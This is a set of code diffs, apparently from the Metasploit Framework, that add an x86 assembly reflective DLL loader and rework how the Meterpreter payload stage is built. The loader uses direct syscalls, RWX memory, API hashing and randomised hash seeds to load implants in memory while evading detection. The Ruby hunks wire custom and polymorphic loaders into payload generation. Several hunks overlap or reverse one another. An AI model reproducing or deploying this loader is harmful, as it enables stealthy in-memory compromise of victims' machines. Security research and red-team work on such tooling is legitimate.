+    mov     ecx, uiLibraryAddress
+    mov     eax, [ecx + 0x3C]
+    add     eax, ecx                   ; eax = NT headers VA
+    mov     uiHeaderValue, eax
+
+    ; ZwAllocateVirtualMemory(-1, &BaseAddress, 0, &RegionSize,
+    ;                         MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
+    ; SizeOfImage at NT + 0x50
+    sub     esp, 8
+    mov     dword [esp], 0             ; local BaseAddress = NULL
+    mov     edx, uiHeaderValue
+    mov     edx, [edx + 0x50]         ; SizeOfImage
+    mov     [esp + 4], edx             ; local RegionSize = SizeOfImage
+    ; push args right-to-left (stdcall)
+    push    PAGE_EXECUTE_READWRITE     ; arg6: Protect
+    push    MEM_RESERVE | MEM_COMMIT   ; arg5: AllocationType
+    lea     eax, [esp + 12]            ; &RegionSize
+    push    eax                        ; arg4: pRegionSize
+    push    0                          ; arg3: ZeroBits = 0
+    lea     eax, [esp + 16]            ; &BaseAddress
+    push    eax                        ; arg2: pBaseAddress
+    push    -1                         ; arg1: ProcessHandle = current process
+    mov     edx, pZwAllocateVirtualMemory
+    call    .direct_syscall            ; stdcall, callee cleans 24 bytes
+    mov     eax, [esp]                 ; retrieve allocated BaseAddress
+    add     esp, 8                     ; free locals
+    mov     uiBaseAddress, eax
+
+    ; copy headers
+    mov     edx, uiHeaderValue
+    mov     ecx, [edx + 0x54]         ; SizeOfHeaders
+    mov     esi, uiLibraryAddress
+    mov     edi, uiBaseAddress
+    rep movsb
+
+    ; =========================================================================
+    ; STEP 3: copy sections
+    ; =========================================================================
+    mov     edx, uiHeaderValue
+    movzx   eax, word [edx + 0x14]    ; SizeOfOptionalHeader
+    lea     ebx, [edx + 0x18 + eax]   ; first IMAGE_SECTION_HEADER
+    movzx   eax, word [edx + 0x06]    ; NumberOfSections
+    mov     uiValueB, eax
+
+.copy_sections:
+    cmp     uiValueB, 0
+    jz      .step4
+
+    ; destination: uiBaseAddress + section.VirtualAddress
+    mov     eax, [ebx + 0x0C]
+    mov     edi, uiBaseAddress
+    add     edi, eax
+
+    ; source: uiLibraryAddress + section.PointerToRawData
+    mov     eax, [ebx + 0x14]
+    mov     esi, uiLibraryAddress
+    add     esi, eax
+
+    ; size: SizeOfRawData
+    mov     ecx, [ebx + 0x10]
+    rep movsb
+
+    add     ebx, 40                    ; sizeof(IMAGE_SECTION_HEADER) = 40
+    dec     uiValueB
+    jmp     .copy_sections
+
+    ; =========================================================================
+    ; STEP 4: process import table
+    ; =========================================================================
+.step4:
+    ; IMAGE_DIRECTORY_ENTRY_IMPORT (index 1)
+    ; PE32: DataDirectory[1] = NT + 0x78 + 1*8 = NT + 0x80
+    mov     edx, uiHeaderValue
+    mov     eax, [edx + 0x80]         ; import dir VirtualAddress
+    test    eax, eax
+    jz      .step5
+    add     eax, uiBaseAddress
+    mov     uiValueD, eax             ; save import descriptor pointer
+
+.import_desc_loop:
+    mov     edx, uiValueD
+    mov     eax, [edx + 0x0C]         ; Name RVA
+    test    eax, eax
+    jz      .step5
+
+    ; LoadLibraryA(name)
+    add     eax, uiBaseAddress
+    push    eax
+    call    pLoadLibraryA              ; stdcall, callee cleans 4 bytes
+    mov     uiValueE, eax             ; loaded library base
+
+    ; OriginalFirstThunk (prefer for lookup)
+    mov     edx, uiValueD
+    mov     eax, [edx + 0x00]         ; OriginalFirstThunk RVA
+    test    eax, eax
+    jnz     .have_oft
+    mov     eax, [edx + 0x10]         ; fall back to FirstThunk
+.have_oft:
+    add     eax, uiBaseAddress
+    mov     esi, eax                   ; esi = lookup thunk array (DWORD entries)
+
+    ; FirstThunk (IAT) — this is what we patch
+    mov     eax, [edx + 0x10]
+    add     eax, uiBaseAddress
+    mov     edi, eax                   ; edi = IAT entry (DWORD)
+
+.iat_loop:
+    ; read thunk value from lookup array
+    mov     eax, [esi]
+    test    eax, eax
+    jz      .next_import_desc
+
+    ; check IMAGE_ORDINAL_FLAG32
+    test    eax, IMAGE_ORDINAL_FLAG32
+    jnz     .import_by_ordinal
+
+    ; import by name: eax = RVA of IMAGE_IMPORT_BY_NAME
+    add     eax, uiBaseAddress
+    add     eax, 2                     ; skip Hint (WORD), point to Name
+    ; GetProcAddress(hModule, lpProcName)
+    push    eax
+    push    uiValueE
+    call    pGetProcAddress            ; stdcall, callee cleans 8 bytes
+    mov     [edi], eax                 ; patch IAT
+    jmp     .next_iat
+
+.import_by_ordinal:
+    ; GetProcAddress(hModule, MAKEINTRESOURCE(ordinal))
+    and     eax, 0xFFFF               ; ordinal = low 16 bits
+    push    eax
+    push    uiValueE
+    call    pGetProcAddress
+    mov     [edi], eax
+
+.next_iat:
+    add     esi, 4                     ; next lookup thunk (DWORD)
+    add     edi, 4                     ; next IAT entry (DWORD)
+    jmp     .iat_loop
+
+.next_import_desc:
+    add     uiValueD, 20              ; sizeof(IMAGE_IMPORT_DESCRIPTOR) = 20
+    jmp     .import_desc_loop
+
+    ; =========================================================================
+    ; STEP 5: apply base relocations
+    ; =========================================================================
+.step5:
+    ; delta = new_base - original ImageBase
+    ; PE32: ImageBase at OptHdr+0x1C => NT+0x18+0x1C = NT+0x34
+    mov     edx, uiHeaderValue
+    mov     eax, uiBaseAddress
+    sub     eax, [edx + 0x34]         ; delta = new_base - ImageBase
+    mov     uiLibraryAddress, eax     ; reuse slot as delta
+
+    ; reloc dir: PE32 DataDirectory[5] = NT+0x78 + 5*8 = NT+0xA0
+    mov     eax, [edx + 0xA0]         ; reloc dir VirtualAddress
+    test    eax, eax
+    jz      .step6
+    mov     ecx, [edx + 0xA4]         ; reloc dir Size
+    test    ecx, ecx
+    jz      .step6
+
+    add     eax, uiBaseAddress
+    mov     uiValueD, eax             ; first IMAGE_BASE_RELOCATION block
+
+.reloc_block_loop:
+    mov     edx, uiValueD
+    mov     eax, [edx + 4]            ; SizeOfBlock
+    test    eax, eax
+    jz      .step6
+
+    ; number of reloc entries = (SizeOfBlock - 8) / 2
+    sub     eax, 8
+    shr     eax, 1
+    mov     uiValueB, eax
+
+    ; block page base VA
+    mov     eax, [edx + 0]            ; block VirtualAddress (DWORD)
+    add     eax, uiBaseAddress
+    mov     uiValueE, eax             ; page base VA
+
+    lea     ebx, [edx + 8]            ; first WORD entry
+
+.reloc_entry_loop:
+    cmp     uiValueB, 0
+    jz      .reloc_next_block
+
+    movzx   eax, word [ebx]
+    mov     ecx, eax
+    shr     ecx, 12                    ; type = high 4 bits
+    and     eax, 0x0FFF               ; offset = low 12 bits
+
+    cmp     ecx, IMAGE_REL_BASED_HIGHLOW
+    jne     .reloc_next_entry
+
+    ; apply HIGHLOW relocation: add delta to DWORD at (page_base + offset)
+    mov     edx, uiValueE
+    add     edx, eax
+    mov     ecx, uiLibraryAddress     ; delta
+    add     [edx], ecx
+
+.reloc_next_entry:
+    add     ebx, 2
+    dec     uiValueB
+    jmp     .reloc_entry_loop
+
+.reloc_next_block:
+    mov     edx, uiValueD
+    mov     eax, [edx + 4]            ; SizeOfBlock
+    add     edx, eax
+    mov     uiValueD, edx
+    jmp     .reloc_block_loop
+
+    ; =========================================================================
+    ; STEP 6: set correct memory protections per section
+    ; =========================================================================
+.step6:
+    ; re-derive NT header
+    mov     ecx, uiBaseAddress
+    mov     eax, [ecx + 0x3C]
+    add     eax, ecx                   ; eax = NT headers VA
+    mov     uiHeaderValue, eax
+
+    ; walk section headers
+    movzx   ecx, word [eax + 0x14]    ; SizeOfOptionalHeader
+    lea     ecx, [eax + 0x18 + ecx]   ; first IMAGE_SECTION_HEADER
+    mov     uiValueD, ecx             ; save section pointer
+    movzx   eax, word [eax + 0x06]    ; NumberOfSections
+    mov     uiValueB, eax
+
+.protect_section_loop:
+    cmp     uiValueB, 0
+    jz      .step7
+
+    mov     ebx, uiValueD              ; ebx = current section header
+
+    ; skip if VirtualSize is 0
+    mov     eax, [ebx + 0x08]         ; VirtualSize
+    test    eax, eax
+    jz      .protect_next_section
+
+    ; derive protection from Characteristics (offset 0x24)
+    ; bits: 29=EXECUTE, 30=READ, 31=WRITE -> shift to bits 0,1,2
+    mov     eax, [ebx + 0x24]         ; Characteristics
+    shr     eax, 29
+    and     eax, 0x7                   ; 3-bit index: XRW
+
+    ; PIC-safe lookup of protection table
+    jmp    .prot_table
+.got_prot_table:
+    pop     ecx                        ; ecx = runtime address of .prot_table
+    movzx   esi, byte [ecx + eax]
+    jmp     .do_protect
+.do_protect:
+    ; esi = NewProtect
+
+    ; ZwProtectVirtualMemory(-1, &BaseAddr, &RegionSize, NewProtect, &OldProtect)
+    sub     esp, 12                    ; locals: BaseAddr(4), RegionSize(4), OldProtect(4)
+    ; local BaseAddress = uiBaseAddress + section.VirtualAddress
+    mov     eax, [ebx + 0x0C]         ; section VirtualAddress RVA
+    add     eax, uiBaseAddress
+    mov     [esp], eax                 ; local BaseAddress
+    ; local RegionSize = section.VirtualSize
+    mov     eax, [ebx + 0x08]         ; VirtualSize
+    mov     [esp + 4], eax            ; local RegionSize
+    mov     dword [esp + 8], 0        ; local OldProtect = 0
+    ; push args right-to-left
+    lea     eax, [esp + 8]
+    push    eax                        ; arg5: &OldProtect
+    push    esi                        ; arg4: NewProtect
+    lea     eax, [esp + 12]
+    push    eax                        ; arg3: &RegionSize
+    lea     eax, [esp + 12]
+    push    eax                        ; arg2: &BaseAddress
+    push    -1                         ; arg1: ProcessHandle = current process
+    mov     edx, pZwProtectVirtualMemory
+    call    .direct_syscall            ; stdcall, callee cleans 20 bytes
+    add     esp, 12                    ; free locals
+
+.protect_next_section:
+    add     uiValueD, 40              ; next section header
+    dec     uiValueB
+    jmp     .protect_section_loop
+
+    ; =========================================================================
+    ; STEP 7: call DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
+    ; =========================================================================
+.step7:
+    ; re-derive NT header (may have been clobbered)
+    mov     ecx, uiBaseAddress
+    mov     eax, [ecx + 0x3C]
+    add     eax, ecx                   ; eax = NT headers
+
+    ; AddressOfEntryPoint at OptHdr+0x10 => NT+0x28
+    mov     eax, [eax + 0x28]
+    add     eax, uiBaseAddress         ; DllMain VA
+    mov     uiValueD, eax             ; save
+
+    ; NtFlushInstructionCache(-1, NULL, 0)
+    push    0                          ; Length
+    push    0                          ; BaseAddress
+    push    -1                         ; ProcessHandle = current process
+    call    pNtFlushInstructionCache   ; stdcall, callee cleans 12 bytes
+
+    ; DllMain(hInstance, DLL_PROCESS_ATTACH, NULL)
+    push    0                          ; lpvReserved
+    push    DLL_PROCESS_ATTACH         ; fdwReason
+    push    uiBaseAddress              ; hinstDLL
+    call    uiValueD                   ; stdcall, callee cleans 12 bytes
+
+    ; return DllMain VA in eax
+    mov     eax, uiValueD
+
+    ; ---- epilogue -----------------------------------------------------------
+    pop     edi
+    pop     esi
+    pop     ebx
+    mov     esp, ebp
+    pop     ebp
+    ret
+
+    ; =========================================================================
+    ; HELPER: .direct_syscall
+    ; IN:  edx = address of Zw/Nt function stub
+    ;      Stack has stdcall args pushed, then return address from call
+    ; Extracts the syscall number from the stub's mov eax,<num> instruction
+    ; and jumps past it into the syscall transition machinery.
+    ; =========================================================================
+.direct_syscall:
+    mov     eax, dword [edx + 1]      ; syscall number from B8 xx xx xx xx
+    lea     edx, [edx + 5]            ; past mov eax instruction
+    jmp     edx
+
+    ; =========================================================================
+    ; HELPER: .get_export_info
+    ; IN:  uiBaseAddress = module DllBase
+    ; OUT: uiExportDir, uiNameArray, uiNameOrdinals, uiValueC=NumberOfNames
+    ; CLOBBERS: eax, ecx, edx
+    ; =========================================================================
+.get_export_info:
+    mov     edx, uiBaseAddress
+    mov     eax, [edx + 0x3C]
+    add     eax, edx                   ; eax = NT headers
+    ; PE32: DataDirectory[0] (Export) = NT + 0x78
+    mov     eax, [eax + 0x78]         ; export dir RVA
+    add     eax, edx                   ; export dir VA
+    mov     uiExportDir, eax
+    ; NumberOfNames
+    mov     ecx, [eax + 0x18]
+    mov     uiValueC, ecx
+    ; AddressOfNames
+    mov     ecx, [eax + 0x20]
+    add     ecx, edx
+    mov     uiNameArray, ecx
+    ; AddressOfNameOrdinals
+    mov     ecx, [eax + 0x24]
+    add     ecx, edx
+    mov     uiNameOrdinals, ecx
+    ret
+
+    ; =========================================================================
+    ; HELPER: .hash_funcname
+    ; IN:  ecx = pointer to null-terminated ASCII function name
+    ; OUT: eax = ROR13 hash
+    ; CLOBBERS: ebx, ecx
+    ; =========================================================================
+.hash_funcname:
+    mov     eax, 0
+.hfn_loop:
+    movzx   ebx, byte [ecx]
+    test    ebx, ebx
+    jz      .hfn_done
+    ror     eax, 13
+    add     eax, ebx
+    inc     ecx
+    jmp     .hfn_loop
+.hfn_done:
+    ret
+.prot_table:
+    call .got_prot_table
+    ;       ---   X     R     XR    W     XW    RW    XRW
+    db      0x01, 0x10, 0x02, 0x20, 0x04, 0x40, 0x04, 0x40

--- a/external/source/shellcode/windows/x86/src/reflective_loader.asm
+++ b/external/source/shellcode/windows/x86/src/reflective_loader.asm
@@ -123,7 +123,7 @@ ReflectiveLoader:
     cmp     dword [ecx + eax], IMAGE_NT_SIGNATURE
     je      .found_base
 .next_page:
-    sub     ecx, 0x1000
+    sub     ecx, 0x1
     jmp     .scan_page
 
 .found_base:
@@ -576,8 +576,6 @@ ReflectiveLoader:
 .got_prot_table:
     pop     ecx                        ; ecx = runtime address of .prot_table
     movzx   esi, byte [ecx + eax]
-    jmp     .do_protect
-.do_protect:
     ; esi = NewProtect
 
     ; ZwProtectVirtualMemory(-1, &BaseAddr, &RegionSize, NewProtect, &OldProtect)

--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -137,7 +137,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
 
   end
 
-  def load_embedded_extensions
+  def load_embedded_extensions(datastore)
     # Rex::Post::Meterpreter::ExtensionMapper.get_extension_klasses
 
     # First of all, let's see if we have stdapi.
@@ -145,6 +145,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
     console.run_single("load stdapi") if commands.length > 0
 
     return if self.platform != 'windows'
+    return if datastore['EXTENSIONS'].nil? || datastore['EXTENSIONS'].empty?
 
     exts = Set.new
     exts.merge(binary_suffix.map { |suffix| MetasploitPayloads.list_meterpreter_extensions(suffix) }.flatten)
@@ -205,7 +206,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
     original = console.disable_output
     console.disable_output = true
 
-    load_embedded_extensions
+    load_embedded_extensions(datastore)
 
     extensions = datastore['AutoLoadExtensions']
     if extensions.is_a?(String)

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -29,9 +29,6 @@ module Payload::Windows::MeterpreterLoader
       'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', },
       'Stage'         => { 'Payload'   => "" }
       ))
-      register_advanced_options([
-        OptBool.new('MeterpreterLoader::CustomLoader', [ false, 'Use a custom loader', false ]),
-      ], self.class)
   end
 
   def asm_invoke_metsrv(opts={})
@@ -106,28 +103,37 @@ module Payload::Windows::MeterpreterLoader
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
-    custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
 
-    loader = reflective_loader()
-    if custom_loader
-      custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x86.bin')
-      unless ::File.exist?(custom_loader_path)
-        print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
-        raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
-      end
+    # Prefer a site-local custom loader binary if the user has dropped one into
+    # the meterpreter search paths (~/.msf4/user_data/meterpreter/ or
+    # <msf>/data/meterpreter/); otherwise assemble the polymorphic reflective
+    # loader on the fly.
+    custom_loader_path = [
+      ::MetasploitPayloads.user_meterpreter_dir,
+      ::MetasploitPayloads.msf_meterpreter_dir
+    ].map { |dir| ::File.join(dir, 'custom_loader.x86.bin') }.find { |p| ::File.readable?(p) }
+
+    if custom_loader_path
+      ::MetasploitPayloads.warn_local_path(custom_loader_path)
       loader = ::File.binread(custom_loader_path)
+    else
+      begin
+        loader = reflective_loader
+      rescue Msf::Payload::Windows::ReflectiveLoaderCommon::Error => e
+        elog('Reflective loader generation failed', error: e)
+        raise
+      end
     end
     dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)))
     asm_opts = {
-        rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
-        length:     dll.length + loader.length, # the total length of the payload is the length of the custom loader + the dll
+        rdi_offset: dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+        length:     dll.length + loader.length, # total payload length = DLL + reflective loader
         stageless:  opts[:stageless] == true
       }
-    puts("WARNING: Local file #{custom_loader_path} is being used") if custom_loader
-    vprint_status("Loader length: #{loader.length} bytes")
-    vprint_status("DLL length: #{dll.length} bytes")
-    vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
-    vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
+    dlog("Loader length: #{loader.length} bytes")
+    dlog("DLL length: #{dll.length} bytes")
+    dlog("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+    dlog("Configuration offset: #{asm_opts[:length]} bytes")
     asm = asm_invoke_metsrv(asm_opts)
 
     # generate the bootstrap asm

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -13,6 +13,7 @@ module Payload::Windows::MeterpreterLoader
 
   include Msf::ReflectiveDLLLoader
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::ReflectiveLoader
 
   def initialize(info = {})
     super(update_info(info,
@@ -105,39 +106,28 @@ module Payload::Windows::MeterpreterLoader
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
-    use_custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
-    custom_loader = nil
+    custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
 
-    # Exceptions will be thrown by the mixin if there are issues.
-    unless use_custom_loader
-      dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build))
-
-      asm_opts = {
-        rdi_offset: offset,
-        length:     dll.length,
-        stageless:  opts[:stageless] == true
-      }
-    else
-      dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)))
+    loader = reflective_loader()
+    if custom_loader
       custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x86.bin')
       unless ::File.exist?(custom_loader_path)
         print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
         raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
       end
-
-      custom_loader = ::File.binread(custom_loader_path)
-      asm_opts = {
-        rdi_offset: dll.length,
-        length:     dll.length + custom_loader.length,
+      loader = ::File.binread(custom_loader_path)
+    end
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)))
+    asm_opts = {
+        rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
+        length:     dll.length + loader.length, # the total length of the payload is the length of the custom loader + the dll
         stageless:  opts[:stageless] == true
       }
-      puts("WARNING: Local file #{custom_loader_path} is being used")
-      vprint_status("Custom loader length: #{custom_loader.length} bytes")
-      vprint_status("DLL length: #{dll.length} bytes")
-      vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
-      vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
-    end
-
+    puts("WARNING: Local file #{custom_loader_path} is being used") if custom_loader
+    vprint_status("Loader length: #{loader.length} bytes")
+    vprint_status("DLL length: #{dll.length} bytes")
+    vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+    vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
     asm = asm_invoke_metsrv(asm_opts)
 
     # generate the bootstrap asm
@@ -145,14 +135,12 @@ module Payload::Windows::MeterpreterLoader
 
     # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
     if bootstrap.length > 62
-      raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
+      raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
     end
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
-    dll = dll + custom_loader if custom_loader
-
-    dll
+    dll + loader
   end
 
 end

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -108,7 +108,8 @@ module Payload::Windows::MeterpreterLoader
     dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(dll_path))
     begin
       rdi_offset = parse_pe(dll)
-    rescue
+    rescue Rex::PeParsey::PeError => e
+      elog("Failed to parse metsrv (x86) as a PE, falling back to the polymorphic loader: #{e.class}: #{e.message}")
       rdi_offset = nil
     end
 
@@ -123,9 +124,10 @@ module Payload::Windows::MeterpreterLoader
 
     use_loader = false
     if custom_loader_path
+      loader = ::File.binread(custom_loader_path)
+      validate_custom_loader!(loader, custom_loader_path)
       dlog("Using custom loader from #{custom_loader_path}")
       ::MetasploitPayloads.warn_local_path(custom_loader_path)
-      loader = ::File.binread(custom_loader_path)
       use_loader = true
     end
 

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -28,6 +28,9 @@ module Payload::Windows::MeterpreterLoader
       'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', },
       'Stage'         => { 'Payload'   => "" }
       ))
+      register_advanced_options([
+        OptBool.new('MeterpreterLoader::CustomLoader', [ false, 'Use a custom loader', false ]),
+      ], self.class)
   end
 
   def asm_invoke_metsrv(opts={})
@@ -102,14 +105,38 @@ module Payload::Windows::MeterpreterLoader
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
-    # Exceptions will be thrown by the mixin if there are issues.
-    dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build))
+    use_custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
+    custom_loader = nil
 
-    asm_opts = {
-      rdi_offset: offset,
-      length:     dll.length,
-      stageless:  opts[:stageless] == true
-    }
+    # Exceptions will be thrown by the mixin if there are issues.
+    unless use_custom_loader
+      dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build))
+
+      asm_opts = {
+        rdi_offset: offset,
+        length:     dll.length,
+        stageless:  opts[:stageless] == true
+      }
+    else
+      dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)))
+      custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x86.bin')
+      unless ::File.exist?(custom_loader_path)
+        print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
+        raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
+      end
+
+      custom_loader = ::File.binread(custom_loader_path)
+      asm_opts = {
+        rdi_offset: dll.length,
+        length:     dll.length + custom_loader.length,
+        stageless:  opts[:stageless] == true
+      }
+      puts("WARNING: Local file #{custom_loader_path} is being used")
+      vprint_status("Custom loader length: #{custom_loader.length} bytes")
+      vprint_status("DLL length: #{dll.length} bytes")
+      vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+      vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
+    end
 
     asm = asm_invoke_metsrv(asm_opts)
 
@@ -123,6 +150,7 @@ module Payload::Windows::MeterpreterLoader
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
+    dll = dll + custom_loader if custom_loader
 
     dll
   end

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -135,7 +135,10 @@ module Payload::Windows::MeterpreterLoader
     end
 
     asm_opts = {
-      rdi_offset: rdi_offset || dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+      # when a custom/polymorphic loader is appended, it must take priority over any
+      # ReflectiveLoader already embedded in the DLL, since that's the loader whose bytes
+      # actually follow the DLL in the payload
+      rdi_offset: use_loader ? dll.length : rdi_offset,
       length:     dll.length + (loader ? loader.length : 0), # total payload length = DLL + reflective loader
       stageless:  opts[:stageless] == true
     }

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -103,6 +103,14 @@ module Payload::Windows::MeterpreterLoader
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
+    loader = nil
+    dll_path = MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(dll_path))
+    begin
+      rdi_offset = parse_pe(dll)
+    rescue
+      rdi_offset = nil
+    end
 
     # Prefer a site-local custom loader binary if the user has dropped one into
     # the meterpreter search paths (~/.msf4/user_data/meterpreter/ or
@@ -113,24 +121,28 @@ module Payload::Windows::MeterpreterLoader
       ::MetasploitPayloads.msf_meterpreter_dir
     ].map { |dir| ::File.join(dir, 'custom_loader.x86.bin') }.find { |p| ::File.readable?(p) }
 
+    use_loader = false
     if custom_loader_path
+      dlog("Using custom loader from #{custom_loader_path}")
       ::MetasploitPayloads.warn_local_path(custom_loader_path)
       loader = ::File.binread(custom_loader_path)
-    else
-      begin
-        loader = reflective_loader
-      rescue Msf::Payload::Windows::ReflectiveLoaderCommon::Error => e
-        elog('Reflective loader generation failed', error: e)
-        raise
-      end
+      use_loader = true
     end
-    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build)))
+
+    if rdi_offset.nil? && !use_loader
+      loader = reflective_loader
+      use_loader = true
+    end
+
     asm_opts = {
-        rdi_offset: dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
-        length:     dll.length + loader.length, # total payload length = DLL + reflective loader
-        stageless:  opts[:stageless] == true
-      }
-    dlog("Loader length: #{loader.length} bytes")
+      rdi_offset: rdi_offset || dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+      length:     dll.length + (loader ? loader.length : 0), # total payload length = DLL + reflective loader
+      stageless:  opts[:stageless] == true
+    }
+
+    dlog("Using custom loader from #{custom_loader_path}") if custom_loader_path
+    dlog('Using polymorphic reflective loader') if !custom_loader_path && use_loader
+    dlog("Loader length: #{loader.length} bytes") if use_loader
     dlog("DLL length: #{dll.length} bytes")
     dlog("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
     dlog("Configuration offset: #{asm_opts[:length]} bytes")
@@ -146,7 +158,8 @@ module Payload::Windows::MeterpreterLoader
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
-    dll + loader
+    dll += loader if use_loader
+    dll
   end
 
 end

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -130,7 +130,7 @@ module Payload::Windows::MeterpreterLoader
     end
 
     if rdi_offset.nil? && !use_loader
-      loader = reflective_loader
+      loader = reflective_loader(iv: datastore_reflective_loader_iv(ds))
       use_loader = true
     end
 

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -135,7 +135,7 @@ module Payload::Windows::MeterpreterLoader
 
     # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
     if bootstrap.length > 62
-      raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
+      raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
     end
 
     # patch the bootstrap code into the dll's DOS header...

--- a/lib/msf/core/payload/windows/reflective_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_loader.rb
@@ -1,0 +1,53 @@
+module Msf::Payload::Windows::ReflectiveLoader
+  def reflective_loader(opts = {})
+    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
+    reflective_loader_asm = Rex::Payloads::Shuffle.from_graphml_file(
+    File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x86.graphml'),
+    arch: ARCH_X86,
+    name: 'reflective_loader'
+    )
+    
+    _patch_bytes = lambda { |asm, oldbytes, newbytes|
+    unless asm.include?(oldbytes)
+        raise "Failed to patch, opcode: #{oldbytes} not found."
+    end
+    asm.sub!(oldbytes, newbytes)
+    }
+
+    _to_hashbytes = lambda { |name, nullbyte: false, unicode: false, iv: 0|
+        name = name.unpack('C*').pack('v*') if unicode
+        fun_hash = Rex::Text.ror13_hash(name + (nullbyte ? "\x00" : ""), iv: iv) & 0xFFFFFFFF
+        [fun_hash].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    }
+
+    # Patching IV
+    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
